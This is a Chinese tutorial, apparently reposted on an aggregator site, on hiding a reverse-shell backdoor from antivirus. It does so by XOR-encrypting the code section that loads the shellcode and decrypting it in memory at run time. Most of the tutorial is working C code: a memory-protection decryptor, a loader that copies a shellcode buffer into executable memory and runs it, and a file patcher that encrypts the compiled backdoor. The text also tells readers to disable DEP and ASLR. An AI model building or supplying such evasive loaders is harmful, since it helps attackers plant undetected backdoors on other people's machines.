1.9 动态解密ShellCode反弹

这篇具有很好参考价值的文章主要介绍了1.9 动态解密ShellCode反弹。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密,然后将加密后的代码回写到原始位置。当程序运行时,将动态解密加密代码,并将解密后的代码回写到原始位置,从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀,因为加密后的代码通常不会被标记为恶意代码。

利用动态解密执行技术可以实现免杀。当程序中使用了敏感的函数时,存在被杀的风险。通过将代码段中的代码进行加密,在需要时直接在内存中解密,可以避免被杀软检测到硬盘文件的特征,从而规避杀软针对硬盘特征的查杀手法。

在学习本章内容之前需要先了解VirtualProtect函数,该函数可以动态调整特定一段内存区域的读写执行属性,该函数原型如下所示;

BOOL WINAPI VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

其中,参数的含义如下:

  • lpAddress:欲更改保护属性的虚拟内存区域的起始地址。
  • dwSize:欲更改保护属性的虚拟内存区域的大小。
  • flNewProtect:新的保护属性。
  • lpflOldProtect:指向变量的指针,用于存储原始保护属性。

有了此关键函数的支持,那么实现动态解密执行将变得容易,一般而言在设置权限之前需要通过VirtualQuery来查询一下当前权限并将查询结果保存起来,该步骤主要用于在执行解密后来将内存恢复到原始位置,接着通过调用VirtualProtect函数,将该页的保护属性改为PAGE_READWRITE,以便可以对该页进行读写操作,解密函数很容易被实现。

void Decrypt(DWORD* pData, DWORD Size, DWORD value)
{
    // 保存查询结果
    MEMORY_BASIC_INFORMATION mbi_thunk;
    
    // 查询页信息
    VirtualQuery(pData, &mbi_thunk, sizeof(MEMORY_BASIC_INFORMATION));
    
    // 改变页保护属性为读写
    VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, PAGE_READWRITE, &mbi_thunk.Protect);

    // 计算出对数据共需要异或的次数
    Size = Size / 0x4;
    
    // 解密begindecrypt与enddecrypt标签处的数据
    while (Size--)
    {
        *pData = (*pData) ^ value;
        pData++;
    }

    // 恢复页的原保护属性
    DWORD dwOldProtect;
    VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, mbi_thunk.Protect, &dwOldProtect);
}

如上所示该函数接受三个参数:pData 是待解密数据的指针,Size 是数据块的大小(以字节为单位),value 是用来异或解密数据的值。

首先,该函数调用了VirtualQuery函数来获取pData所在虚拟内存页的信息,然后通过调用VirtualProtect函数,将该页的保护属性改为PAGE_READWRITE,以便可以对该页进行读写操作。接下来该函数计算需要对多少个DWORD值进行异或解密。由于每个DWORD4个字节,所以将Size除以0x4就可以得到需要异或解密的DWORD数量。

最后,该函数对每个DWORD值进行异或解密操作,并将解密后的值写回到内存中。解密操作使用了按位异或(^)运算符,即将每个DWORD值中的每个字节与value中对应的字节进行异或操作。由于value是一个DWORD 值,因此在对所有字节进行异或操作时value4个字节会循环使用。最后再次调用VirtualProtect函数,将该页的保护属性改回原来的状态。

主函数中首先读者需要自行生成一段32位的反弹ShellCode后门,并将该区域替换至buf所处位置处,并编译这段代码;

小提示:读者在编译时,请关闭DEP,ASLR,地址随机化等保护,否则VA不固定,无法确定位置。

#pragma comment(linker, "/section:.data,RWE")

typedef void(__stdcall *CODE) ();

int main(int argc, char* argv[])
{
    DWORD AddressA, AddressB, Size, key;
    DWORD *ptr;
    TCHAR cCode[30] = { 0 };

    __asm mov AddressA, offset BeginOEP
    __asm mov AddressB, offset EndOEP

    Size = AddressB - AddressA;
    ptr = (DWORD*)AddressA;

    // 设置加密密钥
    _tcscpy(cCode, L"lyshark");

    key = 1;
    for (unsigned int i = 0; i< lstrlen(cCode); i++)
    {
        key = key * 6 + cCode[i];
    }

    // 执行解密函数
    Decrypt(ptr, Size, key);

BeginOEP:
    __asm inc eax  // 在十六进制工具中对应0x40
    __asm dec eax  // 在十六进制工具中对应0x48

    // MessageBoxA(0, "hello lyshark", 0, 0);

    unsigned char buf[] =
        "\xba\x1a\x77\xba\x2b\xd9\xee\xd9\x74\x24\xf4\x5e\x29\xc9"
        "\xb1\x59\x31\x56\x14\x03\x56\x14\x83\xee\xfc\xf8\x82\x46"
        "\xc3\x73\x6c\xb7\x14\xeb\xe4\x52\x25\x39\x92\x17\x14\x8d"
        "\xd0\x7a\x95\x66\xb4\x6e\x94\x87\x36\x38\x9c\x51\xc2\x34"
        "\x09\xac\x14\x14\x75\xaf\xe8\x67\xaa\x0f\xd0\xa7\xbf\x4e"
        "\xdb\xac\xa6";

    PVOID pFunction = NULL;

    // 分配空间
    pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // 拷贝恶意代码
    memcpy(pFunction, buf, sizeof(buf));

    // 执行代码
    CODE StartShell = (CODE)pFunction;
    StartShell();

EndOEP:
    __asm inc eax
    __asm dec eax

    return 0;
}

此时我们需要将编译代码拖入到WinHex工具内,然后按下Ctrl+Alt+X输入4048找到开始于结束的位置,此处之所以是4048是因为我们在代码片段中布置了__asm inc eax,__asm dec eax是为了方便我们搜索时的特征值,至此我们分别记录下起始地址592结束地址5F4此处的代码需要被工具异或加密。

1.9 动态解密ShellCode反弹,《灰帽黑客:攻守道》,《Visual C++ 安全编程技术实践》,汇编语言,Windows汇编,ShellCode,信息安全,C语言

接下来读者需要实现一个对文件进行加密的功能,如下所示的PatchFile();函数,读者依次传入前面生成的后门程序,并分别传入WinHex中给出的起始地址及结束地址,以及一个加密密钥,此处需保持与上方解密密钥一致;

#include <Windows.h>
#include <tchar.h>
#include <iostream>

// 异或加密
bool PatchFile(LPCTSTR szFileName, DWORD address1, DWORD address2, LPCTSTR szRegCode)
{
    TCHAR szBuffer[30] = { 0 };
    DWORD offset, Size, k, nbWritten, szTemp;;
    HANDLE hFile;
    DWORD* ptr;

    hFile = CreateFile(
        szFileName,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        return false;
    }

    // 对输入的注册码进行一定的变换,得到密钥k ,k = F(注册码)
    k = 1;
    for (DWORD i = 0; i < _tcslen(szRegCode); i++)
    {
        k = k * 6 + szRegCode[i];
    }

    Size = address2 - address1;

    // 加密时,每次异或 DWORD数据,Size是为最终需要异或的次数
    Size = Size / 0x4;
    offset = address1;

    for (DWORD i = 0; i < Size; i++)
    {
        SetFilePointer(hFile, offset, NULL, FILE_BEGIN);

        // 读取DWORD字节的文件内容
        ReadFile(hFile, szBuffer, 4, &szTemp, NULL);
        ptr = (DWORD*)szBuffer;
        *ptr = (*ptr) ^ k;
        SetFilePointer(hFile, offset, NULL, FILE_BEGIN);

        // 写入文件
        if (!WriteFile(hFile, ptr, 4, &nbWritten, NULL))
        {
            CloseHandle(hFile);
            return false;
        }
        offset = offset + 4;
    }

    CloseHandle(hFile);
    return true;
}

int main(int argc, char* argv[])
{
    bool bSuccess = PatchFile("d://lyshark.exe", 0x592, 0x5f4, "lyshark");
    if (bSuccess)
    {
        printf("ShellCode 已被加密替换");
    }

    system("pause");
    return 0;
}

这段代码运行后将会通过异或运算替换lyshark.exe程序中的0x592-0x5f4之间的机器码,并以lyshark为密钥依次异或替换;

当程序没有运行到指定区域时区域内的数据默认处于加密状态,此时的汇编指令集则处于被保护的状态;

1.9 动态解密ShellCode反弹,《灰帽黑客:攻守道》,《Visual C++ 安全编程技术实践》,汇编语言,Windows汇编,ShellCode,信息安全,C语言

而一旦EIP指针运行到此处时,则此处的代码将被解密并展开,由于指令执行到此处才会被解密执行,而未被执行则处于加密状态,所以这将导致多数磁盘查杀无法查出特征值,内存查杀也需要真正运行到此处才能确定此处代码的真正功能;

1.9 动态解密ShellCode反弹,《灰帽黑客:攻守道》,《Visual C++ 安全编程技术实践》,汇编语言,Windows汇编,ShellCode,信息安全,C语言文章来源地址https://www.toymoban.com/news/detail-688249.html

到了这里,关于1.9 动态解密ShellCode反弹的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Python灰帽——Scapy模块 / 数据包的构造、发送、接收、捕获

    \\\" 网络神器 \\\" scapy 是 python 的一个第三方模块,能够发送、捕获、分析和铸造网络数据包 主要功能:扫描、识别、测试、攻击、包铸造、抓包分析 在编辑器导入 scapy 包 简单构造 构造数据包 Scapy 中的分层结构 OSI 模型中的下层协议在前,以 / 隔开 Ether()/IP()/TCP() Ether 类用于设

    2024年02月22日
    浏览(45)
  • NOI / 1.9编程基础之顺序 09:直方图

    描述 给定一个非负整数数组,统计里面每一个数的出现次数。我们只统计到数组里最大的数。 假设 Fmax (Fmax 10000)是数组里最大的数,那么我们只统计 {0,1,2.....Fmax} 里每个数出现的次数。 输入 第一行n是数组的大小。1 = n = 10000。 紧接着一行是数组的n个元素。 输出 按顺序

    2024年02月09日
    浏览(79)
  • 小程序动态调试-解密加密数据与签名校验

    前言: 微信小程序的加密与验签早前大多数情况,要么就是逆向获取源码而后拿到加密秘钥,要么就是逆向拿到源码后使用腾讯自带的小程序开发者功能进行动态调试模拟,今天介绍一款志远大佬的开源工具—WeChatOpenDevTool 工具下载地址: https://github.com/JaveleyQAQ/WeChatOpenDevTo

    2024年03月13日
    浏览(42)
  • Kotlin 1.9 新特性预览:data object (数据单例)

    data object (数据单例) 是 Kotlin 1.9 中预定引入的新特性 ,但其实从 1.7.20 开始就可以预览了。启动预览需要在 gradle 中升级 KotlinCompileVersion: 接下来让我们看看它有哪些特点。 data object 相对于普通 object ,在调用 toString() 的时候,前者的可读性更好,输出类名,不再携带 HashC

    2024年02月12日
    浏览(37)
  • 【kali-信息收集】(1.9)Metasploit+搜索引擎工具Shodan

    目录 一、简介 1.1、概述: 二、使用 2.1、过滤语法 City、Country命令 HOSTNAME命令 NET命令 Title命令 搜索 组合搜索 其他搜索术语 2.2、Metasploit实现Shodan搜索 (1)注册 (2)获取API (3)启动PostgreSQL服务 (4)启动Metasploit服务 (5)启动MSF终端 (6)选择模块 (7)配置参数 (8) 启动搜索引擎 Sh

    2024年02月13日
    浏览(55)
  • 解密动态内存管理的奥秘(含内存4个函数)

    目录 一.为什么存在动态内存管理 二.动态内存函数的介绍 1. malloc函数(memory  alloc  内存开辟) 函数介绍: malloc函数使用举例代码: 2.free(释放)  函数介绍: 代码的示例: 3.calloc 函数介绍: 代码示例: 运行结果: 4.realloc 函数介绍: 使用示例代码: 常见的动态内存管

    2024年02月16日
    浏览(31)
  • 小蜗语音工具1.9、文本,小说,字幕生成语音、多角色对话,语音识别、读取音频字幕

    可以把正本小说,生成字幕文件。不限制文件的大小 a、 分割字符 :默认通过**,。!–:?“”** 来把内容分割成一句一句的字幕,可以自定义 b、 删除符号 :默认删除【】=、等符号,删除内容里面的这些特殊符号并且替换为空格,可以自定义 c、 删除文字 : 第(. )章(

    2024年02月10日
    浏览(54)
  • [速成] Visual Studio C/C++创建Dll(动态链接库)并调用

    以下示例均在VS2022环境下完成。 注意: _EXPORTING 是笔者 自定义宏 ,用于区分当前是导出dll还是调用dll,要实现导出函数,还需要在实现Dll函数功能的 项目属性 里,添加 预处理定义 (记得结尾加 分号 ),如下图: _declspec(dllexport) 是VC的,表示 导出函数 到dll; _declspec(dllim

    2024年02月04日
    浏览(47)
  • ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具

    ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360火绒电脑管家Windows Defender(其他杀软未测试)。 该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络

    2024年02月04日
    浏览(54)
  • 通过Microsoft Visual Studio将.c源文件编译成.dll动态链接库

    手里有一个.c源文件,想用VS2017将其编译成.dll,直接在VS2017里打开源文件无法执行编译,因为VS2017不能编译杂项文件。 首先,新建-项目-Visual C++-Windows桌面,选择“动态链接库(DLL)”,给定项目名称和存放位置,点确定。然后在“解决方案资源管理器窗口”,右击“源文件”

    2024年02月12日
    浏览(59)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包